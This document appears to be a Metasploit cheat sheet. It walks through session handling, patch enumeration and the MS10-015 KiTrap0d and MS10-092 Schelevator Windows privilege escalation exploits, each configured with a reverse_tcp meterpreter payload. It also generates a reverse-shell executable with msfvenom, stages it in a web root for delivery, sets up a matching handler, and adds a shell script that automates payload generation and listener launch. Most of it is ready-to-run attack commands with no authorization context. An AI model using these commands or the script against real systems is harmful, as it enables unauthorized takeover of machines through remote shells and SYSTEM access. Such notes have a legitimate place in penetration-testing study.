Core MSFConsole Commands
Search & Discovery
# Find post-exploitation modules for Windows
search type:post platform:windows
# Find local Windows exploits (privilege escalation)
search type:exploit platform:windows path:local
Session Management
# List all open sessions (including backgrounded ones)
sessions -l
# Interact with a backgrounded session by ID (background it again with Ctrl-Z / background)
sessions -i <session_id>
Post-Exploitation: Information Gathering
Enumerate Patches & Vulnerabilities
Use the enum_patches module to list the hotfixes installed on the target and flag missing patches that have matching local exploits:
use post/windows/gather/enum_patches
set SESSION 1
show options # Verify SESSION is set correctly
run
Note: This module requires an active session. The SESSION parameter must match an ID from sessions -l. A missing patch only suggests a candidate exploit; the target OS version and session architecture still have to match the module's requirements.
Privilege Escalation Exploits
MS10-015 (KiTrap0d)
Exploits a flaw in the 32-bit Windows kernel's Virtual DOS Machine (VDM) support to gain SYSTEM privileges. It only works from a 32-bit (x86) session on 32-bit Windows:
# Get detailed info about the exploit
info exploit/windows/local/ms10_015_kitrap0d
# Configure and run the exploit
use exploit/windows/local/ms10_015_kitrap0d
set SESSION 1
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.160.110
set LPORT 7479
exploit
MS10-092 (Schelevator)
Abuses a Task Scheduler flaw on Vista/7/Server 2008-era systems to run an attacker-controlled scheduled task as SYSTEM:
# Get detailed info about the exploit
info exploit/windows/local/ms10_092_schelevator
# Configure and run the exploit
use exploit/windows/local/ms10_092_schelevator
set SESSION 1
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.160.110
set LPORT 7478
exploit
Payload Generation & Delivery
Create Standalone Payload with MSFVenom
Generate executable payload for manual delivery:
# Create Windows reverse TCP meterpreter payload
msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=192.168.168.110 \
LPORT=7477 \
-f exe \
-o /var/www/html/payload.exe
Set Up a Listener for Manual Payloads
When delivering payloads manually, set up a handler to catch the connection. The payload type, LHOST and LPORT must match what was passed to msfvenom:
use exploit/multi/handler
set LHOST 192.168.168.110
set LPORT 7477
set payload windows/meterpreter/reverse_tcp
show options # Verify settings
exploit
Getting a Meterpreter Shell: Two Approaches
Method 1: Direct Exploitation
- Use an exploit module that automatically drops and executes the payload
- The listener is handled automatically by the exploit
- One-step process from exploit to shell
Method 2: Manual Payload Delivery
- Create the payload with msfvenom
- Deliver the payload to the target (social engineering, web server, etc.)
- Set up a listener with exploit/multi/handler, using the same payload, LHOST and LPORT
- Execute the payload on the target to establish the connection
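As an added example (not part of the original notes), the POSIX shell script below drives Method 2 end to end from one set of variables: it builds the msfvenom command line, writes a matching exploit/multi/handler resource script for msfconsole -r, and checks that the two agree before launching anything, which turns the "handler not catching connections" troubleshooting item into an automated check. The address 192.168.168.110, port 7477 and output path are the placeholders used in the notes above; msfvenom and msfconsole are only invoked when the script is run with the argument run.

```sh
#!/bin/sh
# Added example, not from the original notes: keep msfvenom and multi/handler in sync.
# Placeholder values (assumptions): attacker address 192.168.168.110, port 7477,
# output path /var/www/html/payload.exe. Override any of them via the environment.

LHOST="${LHOST:-192.168.168.110}"
LPORT="${LPORT:-7477}"
PAYLOAD="${PAYLOAD:-windows/meterpreter/reverse_tcp}"
OUT="${OUT:-/var/www/html/payload.exe}"

# venom_cmd: print the msfvenom command line built from the shared variables,
# so it can be inspected (or tested) without msfvenom being installed.
venom_cmd() {
    printf 'msfvenom -p %s LHOST=%s LPORT=%s -f exe -o %s\n' \
        "$PAYLOAD" "$LHOST" "$LPORT" "$OUT"
}

# handler_rc: print a msfconsole resource script for exploit/multi/handler that
# uses the same payload, LHOST and LPORT. ExitOnSession false keeps the handler
# listening after the first callback; -j runs it as a background job and -z
# avoids dropping straight into the new session.
handler_rc() {
    cat <<EOF
use exploit/multi/handler
set PAYLOAD $PAYLOAD
set LHOST $LHOST
set LPORT $LPORT
set ExitOnSession false
exploit -j -z
EOF
}

# rc_matches FILE: succeed only if the resource script sets exactly the payload,
# LHOST and LPORT that the payload was generated with.
rc_matches() {
    rc="$1"
    grep -q "^set PAYLOAD $PAYLOAD\$" "$rc" &&
    grep -q "^set LHOST $LHOST\$" "$rc" &&
    grep -q "^set LPORT $LPORT\$" "$rc"
}

# Only touch the real tools when explicitly asked: ./handler.sh run
if [ "${1:-}" = "run" ]; then
    handler_rc > handler.rc
    rc_matches handler.rc || { echo "handler.rc does not match payload settings" >&2; exit 1; }
    sh -c "$(venom_cmd)"          # generate payload.exe
    msfconsole -q -r handler.rc   # start the listener
fi
```

Run it as `LHOST=10.0.0.5 LPORT=4444 sh handler.sh run` to point both the payload and the handler at a different attacker address; because both sides are derived from the same variables, a mismatch can only arise from an edited handler.rc, which rc_matches catches before the listener starts.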
Quick Reference Checklist
Before Running Exploits
- Verify you have an active session (sessions -l)
- Check exploit requirements (info <exploit_name>): supported OS versions, session type and architecture
- Ensure LHOST/LPORT are correct for your network
- Verify payload compatibility with the target
After Successful Exploitation
- Check the new session ID (sessions -l)
- Test session functionality (sessions -i <id>)
- Run post-exploitation modules for persistence and information gathering
Key Concepts to Remember
Session vs Shell: A session is Metasploit's way of managing a connection to a compromised host; a shell or Meterpreter instance is what runs inside it. Multiple sessions can exist simultaneously.
Local vs Remote Exploits: Local exploits run through an existing session on the target (typically privilege escalation), while remote exploits attack a service from across the network.
Payloads vs Exploits: Exploits are the attack vectors; payloads are what gets executed after successful exploitation (usually shells or Meterpreter sessions).
Common Troubleshooting
Handler not catching connections: Verify LHOST/LPORT match between payload and handler
Privilege escalation fails: Run enum_patches first to identify candidate exploits, then confirm the target OS version and session architecture match the module (for example, KiTrap0d needs a 32-bit session)
Sessions die immediately: Check antivirus, Windows Defender, or other security controls